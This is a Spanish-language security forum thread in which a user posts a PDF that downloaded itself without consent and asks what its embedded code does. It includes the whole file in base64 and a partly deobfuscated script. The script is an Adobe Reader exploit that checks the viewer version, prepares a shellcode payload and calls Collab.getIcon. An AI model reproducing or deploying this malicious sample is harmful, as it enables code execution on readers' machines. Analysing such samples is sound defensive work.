Imprimir Página - ¿Alguien sabe que hace este código?

Pues resulta que me he metido en una web y se me ha bajado sin mi permiso este lindo archivo como si fuera un PDF, al examinarlo me he encontrado con esto en su interior, por ello agradeceria mucho si alguien pudiera decirme a grosso modo que hace este código, porque yo en progrmación, muy bueno no soy XDD
Muchas gracias a todos

PD: La lista de numeros (factoriales??) del estilo 145! 24!... era mucho mas larga, la he cortado para que el post no sea tan horrendo XDDDD

Código:

YSVQREYtMTExMTMzMTExMTEzMzMzMzEKMyAwIG9iagolCjw+CmVuZG9iagolCjQgMCBvYmoKPD4Kc3RyZWFtCmVuZHN0cmVhbQplbmRvYmoKJQoxIDAgb2JqCjw+CmVuZG9iago1IDAgb2JqCjw+CmVuZG9iagoyIDAgb2JqCjw8Ci9Qcm9jU2V0IFsvUERGIC9UZXh0IC9JbWFnZUIgL0ltYWdlQyAvSW1hZ2VJXQovRm9udCA8PAovRjEgNSAwIFIKPj4KL1hPYmplY3QgPDwKPj4KPj4KZW5kb2JqCiUKNiAwIG9iago8PAovTmFtZXMgWyhhc2pkbikgNyAwIFIgXQo+PgplbmRvYmoKNyAwIG9iago8PAovUyAvamF2YXNjcmlwdAovSlMgKAogcyA9ICIgMTAhIDExOCEgOTchIDExNCEgMzIhIDk3ISAxMTQhIDExNCEgMTIxISAzMiEgNjEhIDMyISAxMTAhIDEwMSEgMTE5ISAzMiEgNjUhIDExNCEgMTE0ISA5NyEgMTIxISA0MCEgNDEhIDU5ISAxMCEgMTAyISAxMTchIDExMCEgOTkhIDExNiEgMTA1ISAxMTEhIDExMCEgMzIhIDEwMiEgMTA1ISAxMjAhIDk1ISAxMDUhIDExNiEgNDAhIDEyMSEgOTchIDExNCEgMTE1ISAxMTIhIDQ0ISAzMiEgMTA4ISAxMDEhIDExMCEgMTE0ISAxMTAhIDMyISAxMjEhIDk3ISAxMTQhIDExNSEgMTEyISA1OSEgMzIhIDEwISAxMjUhIDEwISAxMTghIDk3ISAxMTQhIDMyISAxMTghIDEwMSEgMTE0ISAxMTUhIDEwNSEgMTExISAxMTAhIDMyISA2MSEgMzIhIDk3ISAxMTIhIDExMiEgNDYhIDExOCEgMTA1ISAxMDEhIDExOSEgMTAxISAxMTQhIDg2ISAxMDEhIDExNCEgMTE1ISAxMDUhIDExMSEgMTEwISA1OSEgMTAhIDEwNSEgMTAyISAzMiEgNDAhIDExOCEgMTAxISAxMTQhIDExNSEgMTA1ISAxMTEhIDExMCEgMzIhIDYyISAzMiEgNTYhIDQxISAzMiEgMTAhIDEyMyEgMTAhIDExOCEgOTchIDExNCEgMzIhIDExMiEgOTchIDEyMSEgMTA4ISAxMTEhIDk3ISAxMDAhIDMyISA2MSEgMzIhIDExNyEgMTEwISAxMDEhIDExNSEgOTkhIDk3ISAxMTIhIDEwMSEgNDAhIDM0ISAzNyEgMTE3ISA2NSEgNDkhIDU0ISA1MiEgMzchIDExNyEgNDghIDQ4ISA0OSEgNTYhIDM3ISAxMTchIDQ4ISA0OCEgNDghIDQ4ISAzNyEgMTE3ISA1MiEgNDghIDU2ISA2NiEgMzchIDExNyEgNTYhIDY2ISA1MSEgNDghIDM3ISAxMTchIDUzISA1MiEgNTIhIDEwISAzMiEgOTchIDExMiEgMTEyISA0NiEgMTAwISAxMTEhIDk5ISA0NiEgNjchIDExMSEgMTA4ISAxMDghIDk3ISA5OCEgNDYhIDEwMyEgMTAxISAxMTYhIDczISA5OSEgMTExISAxMTAhIDQwISAxMTYhIDg1ISA3NyEgMTA0ISA3OCEgOTghIDcxISAxMTkhIDQxISA1OSEgMTAhIDEyNSEgMTAhIDEyNSEgMTAiLnJlcGxhY2UoL1tBLVphLXpdL2csZnVuY3Rpb24gKHN0KXthPTIyMztiPTY1O3JldHVybiBTdHJpbmcuZnJvbUNoYXJDb2RlKCgoKHN0ID0gc3QuY2hhckNvZGVBdCgwKSkgJiBhKSAtMTArNjIpICUxMCsxNiArIChzdCAmIDMxKzEpICsgYik7fSkuc3BsaXQoIiEgIik7dmFyIEprbm5Cdj0iZm8iO3ZhciBxcWVlclI9InIiO3ZhciBxcnQ9IihpIjt2YXIgSEhqZHhjPSI9MCI7dmFyIHVpdVRXPSJpPCI7dmFyIFZxd2Vxd2V0PSJsIisiZW4iO3ZhciBkZj0iKyIrIisiOwp2YXIgVFR5cmVRPSI9UyI7LypsbGxsbGxsbGwqLy8qbGxsbGxsbGxsKi8vKmxsbGxsbGxsbCovdmFyIG5tTUo9Im8iOy8qbGxsbGxsbGxsKi8vKmxsbGxsbGxsbCovdmFyIHR5dWlkPSJvIjsvKmxsbGxsbGxsbCovdmFyIFlVaW90cj0iW2ldKTt9IjtwID0iIjsvKmxsbGxsbGxsbCovZXZhbChKa25uQnYrcXFlZXJSK3FydCtISGpkeGMrIjsiK3VpdVRXKyJzLiIrVnF3ZXF3ZXQrImd0aCIrIjtpIitkZisiKXsiKyJwKyIrVFR5cmVRKyJ0cmkiKyJuZyIrIi5mciIrbm1NSisibUMiKyJoIisiYXJDIit0eXVpZCsiZGUiKyIocyIrWVVpb3RyKTsvKmxsbGxsbGxsbCovZXZhbChwKTsvLypsbGxsbGxsbGwqLy8qbGxsbGxsbGxsKi8vKmxsbGxsbGxsbCovLy8vKmxsbGxsbGxsbCovLypsbGxsbGxsbGwqLy8qbGxsbGxsbGxsKi8vKQo+PgplbmRvYmoKJQo4IDAgb2JqCjw8Ci9Qcm9kdWNlciAoTmVUU25yeCkKL1RpdGxlIChvRDg2M3FBKQovU3ViamVjdCAoUUpwZzNqKQovQXV0aG9yIChWZ2dMelhHMFpaNSkKL0tleXdvcmRzIChrR0NPTGFFbml6SHApCi9DcmVhdG9yICh0dkVlU0ZDUHgpCi9DcmVhdGlvbkRhdGUgKEQ6MjAwOTA1MDEyMTIxNDUpCj4+CiUKZW5kb2JqCjkgMCBvYmoKPDwKL1R5cGUgL0NhdGFsb2cKL1BhZ2VzIDEgMCBSCi9PcGVuQWN0aW9uIFszIDAgUiAvRml0SCBudWxsXQovUGFnZUxheW91dCAvT25lQ29sdW1uCi9OYW1lcyA8Pgo+PgolCmVuZG9iagolCnhyZWYKMCAxMAowMDAwMDAwMDAwIDY1NTM1IGYgCjAwMDAwMDAyMzggMDAwMDAgbiAKMDAwMDAwMDQyMSAwMDAwMCBuIAowMDAwMDAwMDA5IDAwMDAwIG4gCjAwMDAwMDAwODcgMDAwMDAgbiAKMDAwMDAwMDMyNSAwMDAwMCBuIAowMDAwMDAwNTI1IDAwMDAwIG4gCjAwMDAwMDA1NzIgMDAwMDAgbiAKMDAwMDAxNDk4MiAwMDAwMCBuIAowMDAwMDE1MTU5IDAwMDAwIG4gCnRyYWlsZXIKJQo8PAovU2l6ZSAxMAovUm9vdCA5IDAgUgovSW5mbyA4IDAgUgo+PgpzdGFydHhyZWYKMTUyOTEKJSUlRU9GCiU=

Mod: código en base64, sino algunos AV saltan al ingresar a la página

Código desofuscado:

Código

s = String(" 10! 118! 97! 114! 32! 97! 114! 114! 121! 32! 61! 32! 110! 101! 119! 32! 65! 114! 114! 97! 121! 40! 41! 59! 10! 102! 117! 110! 99! 116! 105! 111! 110! 32! 102! 105! 120! 95! 105! 116! 40! 121! 97! 114! 115! 112! 44! 32! 108! 101! 110! 114! 110! 32! 121! 97! 114! 115! 112! 59! 32! 10! 125! 10! 118! 97! 114! 32! 118! 101! 114! 115! 105! 111! 110! 32! 61! 32! 97! 112! 112! 46! 118! 105! 101! 119! 101! 114! 86! 101! 114! 115! 105! 111! 110! 59! 10! 105! 102! 32! 40! 118! 101! 114! 115! 105! 111! 110! 32! 62! 32! 56! 41! 32! 10! 123! 10! 118! 97! 114! 32! 112! 97! 121! 108! 111! 97! 100! 32! 61! 32! 117! 110! 101! 115! 99! 97! 112! 101! 40! 34! 37! 117! 65! 49! 54! 52! 37! 117! 48! 48! 49! 56! 37! 117! 48! 48! 48! 48! 37! 117! 52! 48! 56! 66! 37! 117! 56! 66! 51! 48! 37! 117! 53! 52! 52! 10! 32! 97! 112! 112! 46! 100! 111! 99! 46! 67! 111! 108! 108! 97! 98! 46! 103! 101! 116! 73! 99! 111! 110! 40! 116! 85! 77! 104! 78! 98! 71! 119! 41! 59! 10! 125! 10! 125! 10").split("! ");
p = '';
 
for(i=0;i<s.length;i++){
	p+=String.fromCharCode(s[i]);
}

Al ejecutarlo nos da un 'eval(p)', siendo 'p':

Código

var arry = new Array();
function fix_it(yarsp, lenrn yarsp; 
}
var version = app.viewerVersion;
if (version > 8) 
{
var payload = unescape("%uA164%u0018%u0000%u408B%u8B30%u544
 app.doc.Collab.getIcon(tUMhNbGw);
}
}

Y no puedo decir mucho menos... :S

Foro de elhacker.net

Seguridad Informática => Seguridad => Mensaje iniciado por: Demenus en 13 Mayo 2010, 01:34 am